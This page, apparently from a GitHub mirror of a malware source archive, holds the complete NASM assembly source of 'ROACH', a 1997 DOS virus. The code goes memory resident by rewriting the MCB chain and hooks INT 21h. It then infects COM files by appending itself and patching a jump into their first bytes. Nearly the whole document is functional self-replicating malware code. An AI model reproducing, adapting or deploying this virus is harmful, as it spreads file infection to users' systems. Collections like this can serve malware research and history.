mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 18:02:48 +00:00
312 lines
16 KiB
NASM
312 lines
16 KiB
NASM
;Developed and Programmed in Australia.
|
|
;Copy_ya_right 1997
|
|
|
|
;Virus Name : ROACH
|
|
|
|
;The ROACH virus will install itself memory resident, below the video memory.
|
|
;once this virus is in memory it will only infect COM files. It will not
|
|
;infect command.com.
|
|
|
|
;--------------------------- S T A R T -------------------------------------
|
|
|
|
host_start: ;start of the host file
|
|
jmp virus_start ;start the virus code
|
|
mov ah,4ch ;exit the virus code
|
|
int 21h ;dos call
|
|
|
|
;----- This is the start of the virus code ----------------------------------
|
|
|
|
virus_start: ;start of the virus code
|
|
mov ax,sp ;load ax with stack pointer
|
|
mov si,ax ;move stack pointer to si
|
|
mov ax,ss ;move stack segment to ax
|
|
mov ds,ax ;load ds with stack segment
|
|
mov di,100h ;point to the host start
|
|
mov cx,2 ;we need to do this twice
|
|
push_100_to_stack:
|
|
dec si,2 ;dec the stack pointer
|
|
mov sp,si ;move the stack pointer
|
|
mov word ptr ds:[si],di ;save di to the stack
|
|
loop push_100_to_stack ;do it twice
|
|
|
|
inc di ;inc byte one
|
|
mov al,byte ptr es:[di]
|
|
mov ah,byte ptr es:[di+1]
|
|
add ax,103h
|
|
mov bp,ax ;save to the
|
|
|
|
add si,2 ;inc the stack pointer
|
|
mov sp,si ;mov the stack pointer
|
|
mov di,word ptr ds:[si] ;get the address from stack
|
|
|
|
mov si,bp ;load si with fix address
|
|
add si,virus_len ;and host to the source index
|
|
sub si,3
|
|
push es
|
|
pop ds ;get the data segment
|
|
mov cx,3 ;move 3 bytes
|
|
rep movsb ;and move the data back
|
|
|
|
mov ax,5432h ;are we resident
|
|
int 21h ;dos call
|
|
cmp ax,0063h ;are we resident
|
|
jne memory_resident ;lets go resident
|
|
|
|
exit_virus:
|
|
xor ax,ax ;fix up
|
|
mov bx,ax ;fix up
|
|
mov cx,ax ;fix up
|
|
mov dx,ax ;fix up
|
|
mov di,ax ;fix up
|
|
mov si,ax ;fix up
|
|
mov es,ax ;fix up
|
|
ret ;and return to the host
|
|
|
|
;----- This makes the virus go memory resident ------------------------------
|
|
|
|
memory_resident:
|
|
mov ah,52h ;get the list of lists
|
|
int 21h ;dos call
|
|
mov ax,es:[bx-2] ;load ax first mcb chain
|
|
mov es,ax ;set es to first mcb block
|
|
|
|
mcb1:
|
|
cmp byte ptr es:[0],'Z' ;is it the last mcb chain
|
|
jne mcb2 ;not then next mcb chain
|
|
clc ;clear carry flag
|
|
jmp mcbx ;found last mcb chain, bail
|
|
|
|
mcb2:
|
|
mov ax,es ;mov extra segment to ax
|
|
add ax,word ptr es:[3] ;add from the list
|
|
inc ax ;fix up
|
|
mov es,ax ;es is the new segment
|
|
jmp short mcb1 ;and do it again
|
|
|
|
mcbx:
|
|
mov byte ptr es:[0],'Z' ;make it the last mcb chain
|
|
sub word ptr es:[3],virus_len/15 ;take the virus from the mcb
|
|
add ax,word ptr es:[3] ;
|
|
inc ax ;fix up the address
|
|
mov es,ax ;es is the new segment
|
|
|
|
push es ;save to the stack
|
|
push cs ;push the code segment
|
|
pop ds ;get ds from the stack
|
|
|
|
mov ax,3521h ;get interrupt 21h
|
|
int 21h ;dos call
|
|
mov si,bp ;load the si with virus start
|
|
add si,virus_len ;add the virus len to it
|
|
sub si,7
|
|
mov word ptr ds:[si],bx ;save the old int 21h vector
|
|
mov word ptr ds:[si+2],es ;save the old int 21h vector
|
|
|
|
pop ds ;get from the stack
|
|
mov ax,2521h ;get the interrupt vector
|
|
mov dx,new_21
|
|
|
|
int 21h ;dos call
|
|
push ds
|
|
pop es
|
|
push cs
|
|
pop ds
|
|
xor di,di
|
|
mov si,bp ;offset of the start of virus
|
|
mov cx,virus_len ;number of bytes to move
|
|
|
|
do_load_tsr:
|
|
mov ax,word ptr ds:[si] ;load the byte from host
|
|
mov word ptr es:[di],ax ;store the byte in memory
|
|
add si,2 ;inc the host pointer
|
|
add di,2 ;inc the memory pointer
|
|
loop do_load_tsr
|
|
|
|
push cs ;push the code segment
|
|
pop ds ;reset ds to the original
|
|
jmp exit_virus ;exit the virus code
|
|
|
|
db '[Roach] by SliceMaster 1997' ;copyright string roach
|
|
|
|
;----- This is the code that runs in memory ---------------------------------
|
|
|
|
exit_virus_tsr:
|
|
jmp dword ptr cs:[data_start] ;exit back to the function
|
|
|
|
fake_dos_function:
|
|
pushf ;save the flags
|
|
call dword ptr cs:[data_start] ;fake a dos call
|
|
ret ;and return
|
|
|
|
new_21h:
|
|
cmp ax,5432h ;is it the virus checking
|
|
jne check_interrupts ;check out the interrupts
|
|
mov ax,0063h ;yep we are in memory
|
|
iret ;interrupt return
|
|
|
|
check_interrupts:
|
|
inc ah ;add one the the function
|
|
cmp ah,4ch ;load and exec a program
|
|
je go_virus_infect ;this is our interrupt
|
|
cmp ah,3eh ;open file call
|
|
je go_virus_infect ;this is our interrupt
|
|
cmp ah,44h ;change attrubute call
|
|
je go_virus_infect ;this is our interrupt
|
|
dec ah ;sub one from the function
|
|
jmp exit_virus_tsr ;exit the virus in memory
|
|
|
|
go_virus_infect:
|
|
dec ah ;fix up before we exit
|
|
push ax ;\
|
|
push bx ; \
|
|
push cx ; \
|
|
push dx ; \
|
|
push si ; / save to the stack
|
|
push di ; / so the interrupt
|
|
push ds ; / will work on
|
|
push es ; / exit.
|
|
push bp ;/
|
|
|
|
call check_ext ;is it a com file
|
|
call open_host ;open the host file for r/w
|
|
call read_host_3 ;read the host first 3
|
|
call infect_host ;infect file
|
|
|
|
exit_host_infected:
|
|
call close_host ;close the host file
|
|
|
|
exit_virus_memory: ;ti we are here.
|
|
pop ax ;/
|
|
jmp exit_virus_tsr ;exit the virus tsr
|
|
|
|
;----- This checks the file ext --------------------------------------------
|
|
|
|
check_ext:
|
|
push dx
|
|
pop si ;get the source index
|
|
mov cx,0ffh ;search for a com file ext
|
|
find_ext:
|
|
mov al,byte ptr ds:[si] ;load the byte at ds:dx
|
|
cmp al,'.' ;is it a .
|
|
je found_ext ;found the ext
|
|
inc si ;inc the location
|
|
loop find_ext ;do it again
|
|
|
|
found_ext:
|
|
inc si ;inc the position
|
|
mov ax,word ptr ds:[si] ;load the byte ad ds:si
|
|
cmp ax,'OC' ;is it a com file
|
|
je found_com_file ;do a nother check
|
|
pop ax ;get off the stack
|
|
jmp exit_virus_memory ;not com file bail
|
|
|
|
found_com_file:
|
|
ret ;and return
|
|
|
|
;----- This opens a host file -----------------------------------------------
|
|
|
|
open_host:
|
|
mov ax,3d02h ;open file read write access
|
|
call fake_dos_function ;fake a dos interrupt
|
|
mov bx,ax ;move the handle into bx
|
|
ret ;and return
|
|
|
|
;----- This closes a host file ----------------------------------------------
|
|
|
|
close_host:
|
|
mov ah,3eh ;close a file
|
|
call fake_dos_function ;close the file
|
|
ret ;and return
|
|
|
|
;----- This reads the first 3 bytes from the host ---------------------------
|
|
|
|
read_host_3:
|
|
push ds ;save to the stack
|
|
push dx ;save to the stack
|
|
push cs ;push the code segment
|
|
pop ds ;get the tsr segment
|
|
xor dx,dx ;zero out dx
|
|
add dx,virus_len ;add the virus len to it
|
|
sub dx,3 ;fix up dx to point to buffer
|
|
push dx ;save to the stack
|
|
mov ah,3fh ;read from the host
|
|
mov cx,3 ;read 3 bytes of host
|
|
call fake_dos_function ;fake a dos call
|
|
|
|
pop si ;get si from the stack
|
|
mov ah,byte ptr ds:[si] ;load ah with the first byte
|
|
cmp ah,0e9h ;is it a jump instruction
|
|
je is_infect ;is the file infected
|
|
cmp ah,'M' ;does it have a MZ header
|
|
je is_infect ;the file is a command.com
|
|
pop dx ;get call from the stack
|
|
pop ds ;get call from the stack
|
|
ret ;and return
|
|
|
|
is_infect:
|
|
pop dx ;get from the stack
|
|
pop ds ;get call from the stack
|
|
pop ax ;get call from the stack
|
|
jmp exit_host_infected ;exit the host is infected
|
|
|
|
;----- This infects the host file -------------------------------------------
|
|
|
|
infect_host:
|
|
push ds ;save to the stack
|
|
push dx ;save to the stack
|
|
call lseek_end ;seek to the end of the host
|
|
push ax ;save the location
|
|
push cs ;push the code segment
|
|
pop ds ;get the virus segment
|
|
|
|
mov ah,40h ;time to write virus to end
|
|
mov cx,virus_len ;number of bytes to write
|
|
xor dx,dx ;at the start of the segment
|
|
call fake_dos_function ;fake a dos function
|
|
call lseek_start ;seek to the start
|
|
|
|
xor dx,dx ;zero out dx
|
|
add dx,virus_len ;add the virus len to it
|
|
sub dx,3 ;fix up dx to point to buffer
|
|
mov si,dx ;mov si the pointer
|
|
|
|
mov ah,0e9h ;mov jump instruction in ah
|
|
mov byte ptr ds:[si],ah ;write the jump in
|
|
pop ax ;get off the stack
|
|
dec al,3
|
|
mov word ptr ds:[si+1],ax ;write the address to buffer
|
|
|
|
mov dx,si ;write to dx the pointer
|
|
mov cx,3 ;number of bytes to write
|
|
mov ah,40h ;write to the host file
|
|
call fake_dos_function ;fake a dos function call
|
|
|
|
pop dx ;get off the stack
|
|
pop ds ;get off the stack
|
|
ret ;and return
|
|
|
|
;----- This seeks to the start or end of the host ---------------------------
|
|
|
|
lseek_end:
|
|
mov ax,4202h ;seek to the end
|
|
jmp lseek ;and do the seeking
|
|
lseek_start:
|
|
mov ax,4200h ;seek to the start
|
|
lseek:
|
|
xor dx,dx ;to start/end of host
|
|
xor cx,cx ;to start/end of host
|
|
call fake_dos_function ;fake a dos call
|
|
ret ;and return
|
|
|
|
;----- From here down is were all the data for virus is stored!! ------------
|
|
|
|
data1:
|
|
|
|
old_21h dd 0 ;old interrupt 21h function
|
|
host_3 db 3 dup(90h) ;original first 3 bytes
|
|
|
|
virus_end:
|
|
virus_len equ virus_end - virus_start ;len of the virus code
|
|
data_start equ data1 - virus_start ;starting address of data
|
|
new_21 equ new_21h - virus_start ;len from the start to int
|